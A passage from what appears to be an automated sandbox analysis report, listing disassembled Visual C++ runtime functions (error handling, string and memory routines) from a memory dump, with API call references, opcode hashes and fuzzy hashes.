                                                                                                          • mbstowcs_s.MSVCR100(00000000,?,00000086,00000000,00000085), ref: 6FDFE3E2
                                                                                                            • Part of subcall function 6FDDC408: _mbstowcs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6FDDC41E
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFE3F7
                                                                                                          • _errno.MSVCR100(?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE48D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE497
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__sys_nerr$__set_flsgetvalue__sys_errlist_calloc_crt_errno_invalid_parameter_noinfo_invoke_watson_mbstowcs_s_lmbstowcs_s
                                                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                          • API String ID: 2636177090-798102604
                                                                                                          • Opcode ID: a98e6ced38e99c2d89c1ad88c8a0c0d37b3dce99c85f8d41678d453cae237fe6
                                                                                                          • Instruction ID: c8ff6442c353d6527937a537aaf93827fa0955b2fbfac6519188597180ca4d60
                                                                                                          • Opcode Fuzzy Hash: a98e6ced38e99c2d89c1ad88c8a0c0d37b3dce99c85f8d41678d453cae237fe6
                                                                                                          • Instruction Fuzzy Hash: 2C31AEA254E3E15FC3929B748D69845BF646E5322870EC7DFE8858F493D714F40283A2
                                                                                                          Function 6FDE016C Relevance: 10.6, APIs: 7, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          • Opcode ID: 6d6aac9cbe336c8ab90786dab877a626419ba13a9da16a990dc6e4a4245ecf65
                                                                                                          • Instruction ID: db44ec3a9abfe0ebc3b4ef5883821b1c06fdac3b617bb2c364df0203b59888e0
                                                                                                          • Opcode Fuzzy Hash: 6d6aac9cbe336c8ab90786dab877a626419ba13a9da16a990dc6e4a4245ecf65
                                                                                                          • Instruction Fuzzy Hash: E9312531908395DBDB918FA88848BAE7FF4EF12394F14525AE8E49B181DB70B945C3B1
                                                                                                          Function 6FDE09F4 Relevance: 10.6, APIs: 7, Instructions: 107COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          • Opcode ID: e06729b594db4e0900fa346a784cc4ff668218fa862d2a9aac2610a8e72ccb85
                                                                                                          • Instruction ID: a30d1ebad35e115bb4554342ce1383d4869230263a9ed1ef0f157092ca55b5db
                                                                                                          • Opcode Fuzzy Hash: e06729b594db4e0900fa346a784cc4ff668218fa862d2a9aac2610a8e72ccb85
                                                                                                          • Instruction Fuzzy Hash: BA316C72A4438EDFCB90DF68C8489AEBB75BF01398B14515AD8E15B141DB31F942C7B1
                                                                                                          Function 6FE005BF Relevance: 10.6, APIs: 7, Instructions: 102stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000016,?,?,?,?), ref: 6FE005E1
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000016,?,?,?,?), ref: 6FE005EB
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strlen.MSVCR100(?,?,00000016,?,?), ref: 6FE0063D
                                                                                                          • memmove.MSVCR100(?,?,00000001,?,?,00000016,?,?), ref: 6FE00646
                                                                                                          • strlen.MSVCR100(?,?,00000016,?,?), ref: 6FE00661
                                                                                                          • memmove.MSVCR100(?,?,00000001,?,?,00000016,?,?), ref: 6FE0066A
                                                                                                          • memset.MSVCR100(?,00000030,00000000,?,00000016,?,?), ref: 6FE006A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmovestrlen$_errno_invalid_parameter_invalid_parameter_noinfomemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2621052104-0
                                                                                                          • Opcode ID: f665fb3c27bbd743fd62b3fafc71f8488ffcf5f258ef907837991bf07d242f87
                                                                                                          • Instruction ID: adcf40571f8faf39f5246d56ffd4f7efc95e1442c9746c7eb7b9c2859639c0e1
                                                                                                          • Opcode Fuzzy Hash: f665fb3c27bbd743fd62b3fafc71f8488ffcf5f258ef907837991bf07d242f87
                                                                                                          • Instruction Fuzzy Hash: AF316271800345AFD722AF28CC40B8A7BA9EF8132CF2411A5F9219B381D774F950CBA1
                                                                                                          Function 6FD8BE96 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc_crt.MSVCR100(00000054), ref: 6FD8BEFA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc_crt
                                                                                                          • String ID: bad allocation$csm
                                                                                                          • API String ID: 2419877250-2003371537
                                                                                                          • Opcode ID: ef54996986dd35c87807832d5f1589ff78c05b34fd07fdfc67cd8678d1a85964
                                                                                                          • Instruction ID: 298e2b4370f65cf854cb567c43b21a9a9e93db9935fbf450b5380c05f166a1e0
                                                                                                          • Opcode Fuzzy Hash: ef54996986dd35c87807832d5f1589ff78c05b34fd07fdfc67cd8678d1a85964
                                                                                                          • Instruction Fuzzy Hash: 453179B0C05349EECB82DFE9C5806EEBFF8AF55304F20415EE825A7280D7746A458B62
                                                                                                          Function 6FDBFE89 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFEB6
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(00000000), ref: 6FDBFF00
                                                                                                          • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF14
                                                                                                          • ??_V@YAXPAX@Z.MSVCR100(?,?,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF1C
                                                                                                          • TlsFree.KERNEL32(?,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF26
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(00000000,00000004,00000008,00000060,6FDC4B3C,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF80
                                                                                                            • Part of subcall function 6FDC3731: InterlockedFlushSList.KERNEL32(?,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC373B
                                                                                                            • Part of subcall function 6FDC3731: InterlockedFlushSList.KERNEL32(?,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC3746
                                                                                                            • Part of subcall function 6FDC3731: ??_V@YAXPAX@Z.MSVCR100(?,00000000,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC377E
                                                                                                            • Part of subcall function 6FDC3731: ??3@YAXPAX@Z.MSVCR100(?,?,00000000,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC3784
                                                                                                            • Part of subcall function 6FDC3731: ??_V@YAXPAX@Z.MSVCR100(?,?,6FDBFEB3,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDC3795
                                                                                                          • InterlockedPopEntrySList.KERNEL32(6FE255D0,6FE255DC,?,?,?,?,00000008,6FDBFE54,00000004,6FDBFE1D), ref: 6FDBFF87
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??3@$InterlockedList$Flush$EntryFree
                                                                                                          • String ID:
                                                                                                          • API String ID: 1640940807-0
                                                                                                          • Opcode ID: 4fcf58764868ac76d30a708c019821038f62aa83523606b5fe77bf8a70189d37
                                                                                                          • Instruction ID: 01ba2fb18527edd858414c993a953c077c4ce84790f3d473e8385c14ef3b90f3
                                                                                                          • Opcode Fuzzy Hash: 4fcf58764868ac76d30a708c019821038f62aa83523606b5fe77bf8a70189d37
                                                                                                          • Instruction Fuzzy Hash: 8731A1B6900306DFDB84DFA4C885B2DBBB4BF05325F200259E5219B2E2CB70F911CBA0
                                                                                                          Function 6FDFA38A Relevance: 10.6, APIs: 7, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA39E
                                                                                                          • _errno.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA3A6
                                                                                                            • Part of subcall function 6FDF85A6: _get_osfhandle.MSVCR100(?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1), ref: 6FDF85BF
                                                                                                            • Part of subcall function 6FDF85A6: _errno.MSVCR100(?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?), ref: 6FDF85CC
                                                                                                          • __doserrno.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA3C7
                                                                                                          • _errno.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA3CE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA4A0,00000010), ref: 6FDFA3D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$__doserrno$_get_osfhandle_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2674512625-0
                                                                                                          • Opcode ID: 9aafd6ddc681e03a8dbb6f63376843a394376938e7b4ce4f47b81441066e2a74
                                                                                                          • Instruction ID: 320fd3d44a03b28e99d13a285bd6f4a122bb356e10c657743c37674eaafef9ea
                                                                                                          • Opcode Fuzzy Hash: 9aafd6ddc681e03a8dbb6f63376843a394376938e7b4ce4f47b81441066e2a74
                                                                                                          • Instruction Fuzzy Hash: AA21D071802304DFDB916FB4CC84E6D37A0AF42368F178259E4389F2D0EB74B9428BA1
                                                                                                          Function 6FDFA5D4 Relevance: 10.6, APIs: 7, Instructions: 83COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA5E8
                                                                                                          • _errno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA5F0
                                                                                                          • __doserrno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA613
                                                                                                          • _errno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA61A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA625
                                                                                                          • _errno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA6A6
                                                                                                          • __doserrno.MSVCR100(6FDFA6E8,00000014), ref: 6FDFA6B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: 2bf88e3a98c3839ec9f60dac4d6868340cc26a8c5b31d3c5f46503f3f96aabbe
                                                                                                          • Instruction ID: a0a9670f6a85e088171f1770868f208d24fd0599cc597ff03a4b302232a9b258
                                                                                                          • Opcode Fuzzy Hash: 2bf88e3a98c3839ec9f60dac4d6868340cc26a8c5b31d3c5f46503f3f96aabbe
                                                                                                          • Instruction Fuzzy Hash: 38219371802B549FDBA1AF74CC84E9D3BB0AF82B68F164245D434AF2E1E77479428A71
                                                                                                          Function 6FD96CCB Relevance: 10.6, APIs: 7, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FD96D68,00000010), ref: 6FD96CB9
                                                                                                          • __doserrno.MSVCR100(6FD96D68,00000010), ref: 6FDB056D
                                                                                                          • _errno.MSVCR100(6FD96D68,00000010), ref: 6FDB0575
                                                                                                          • _errno.MSVCR100(6FD96D68,00000010), ref: 6FDB058A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD96D68,00000010), ref: 6FDB0595
                                                                                                          • __doserrno.MSVCR100(6FD96D68,00000010), ref: 6FDB059C
                                                                                                          • _errno.MSVCR100(6FD96D68,00000010), ref: 6FDB05B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: 9673a4dcf641b4538bb3b474dc3afb418401eaa2bb11cf83e8ced258184cac78
                                                                                                          • Instruction ID: 60099500e1b83a495ce9d1f02c667f81fe62cc050ec9a2a0ab7a1590c15e9ae1
                                                                                                          • Opcode Fuzzy Hash: 9673a4dcf641b4538bb3b474dc3afb418401eaa2bb11cf83e8ced258184cac78
                                                                                                          • Instruction Fuzzy Hash: 5621D4B1809300DAD7D16FB8864466D37A0DF433A8F01635EE4711B5D1EB74794187F1
                                                                                                          Function 6FDE04C8 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          • Opcode ID: a86c015b80862a9983bc038de3fd9f4b5d6d87de76820c93078681d3197bc428
                                                                                                          • Instruction ID: 9621b31e82d9f45d88654204755c0745cc8a1fbd5da9a224fefa154846c52524
                                                                                                          • Opcode Fuzzy Hash: a86c015b80862a9983bc038de3fd9f4b5d6d87de76820c93078681d3197bc428
                                                                                                          • Instruction Fuzzy Hash: 9A21B076801209EFCF52AFA8CC4899E3B74AF053A4F109266F5345F1E0DB32B951CBA1
                                                                                                          Function 6FDFA4BC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA4D0
                                                                                                          • _errno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA4D8
                                                                                                          • __doserrno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA4F7
                                                                                                          • _errno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA4FF
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA50A
                                                                                                          • _errno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA57B
                                                                                                          • __doserrno.MSVCR100(6FDFA5B8,00000010), ref: 6FDFA586
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: 35be66b9e1d68d61e77d082c74beb9f697684bbb904f9fb92bf7d78d62062860
                                                                                                          • Instruction ID: fc5d1c652e061169693aad8d28cc211be573292f882dbf7aa627af889a152df2
                                                                                                          • Opcode Fuzzy Hash: 35be66b9e1d68d61e77d082c74beb9f697684bbb904f9fb92bf7d78d62062860
                                                                                                          • Instruction Fuzzy Hash: 6D219D72D423149AE7A26FB48D89B5C3770AF02328F125255D4356F2D1DBB8B9428AB1
                                                                                                          Function 6FDF9DF5 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF9EE0,00000010), ref: 6FDF9E09
                                                                                                          • __doserrno.MSVCR100(6FDF9EE0,00000010), ref: 6FDF9E25
                                                                                                          • _errno.MSVCR100(6FDF9EE0,00000010), ref: 6FDF9E2D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF9EE0,00000010), ref: 6FDF9E37
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno$_errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2864334240-0
                                                                                                          • Opcode ID: ecda112056c0d6bcc6dddc7c9063d5ffda4f1bca9f6643fb3362afcd1915d34f
                                                                                                          • Instruction ID: 06ad71aa88fac049a11fab9b90be9f68ea55cd190b387b6b9faa9b163440a486
                                                                                                          • Opcode Fuzzy Hash: ecda112056c0d6bcc6dddc7c9063d5ffda4f1bca9f6643fb3362afcd1915d34f
                                                                                                          • Instruction Fuzzy Hash: CF21BE71C53315DFE7A0AFA8DD80B9C37A0AF05329F024156E4325F1D5DBB6B9428BA2
                                                                                                          Function 6FDF862B Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8648
                                                                                                          • _errno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8650
                                                                                                          • __doserrno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8670
                                                                                                          • _errno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8678
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF8683
                                                                                                          • _errno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF86DA
                                                                                                          • __doserrno.MSVCR100(6FDF8718,00000014,6FDA89D7,?,00000000,00000000,00000002,?,6FE245D0,?,?,?,6FD93911,?,?), ref: 6FDF86E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2315031519-0
                                                                                                          • Opcode ID: 8e3bcfbe50e80eba71b1d5379052d97a52a00b43f40bcaec03bb4c9f8e08cc00
                                                                                                          • Instruction ID: 1b7f833359baf6c2ed1c3ef8867c84fc6392a043616a75b835aa814cc341e405
                                                                                                          • Opcode Fuzzy Hash: 8e3bcfbe50e80eba71b1d5379052d97a52a00b43f40bcaec03bb4c9f8e08cc00
                                                                                                          • Instruction Fuzzy Hash: 85219F71C06309DFDB81AFA9C940B9C7BF0BF05329F164259D525AB2D0DB75B9028B72
                                                                                                          Function 6FD8A6BA Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCR100(?,?,?,?,6FD8A795,?,6FD8A7B0,00000010), ref: 6FD8A6C5
                                                                                                          • _get_osfhandle.MSVCR100(?), ref: 6FD8A6E8
                                                                                                            • Part of subcall function 6FD8A675: __doserrno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FD8A6B0
                                                                                                            • Part of subcall function 6FD8A675: _errno.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB042A
                                                                                                            • Part of subcall function 6FD8A675: _invalid_parameter_noinfo.MSVCR100(?,6FDF85C4,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?), ref: 6FDB0435
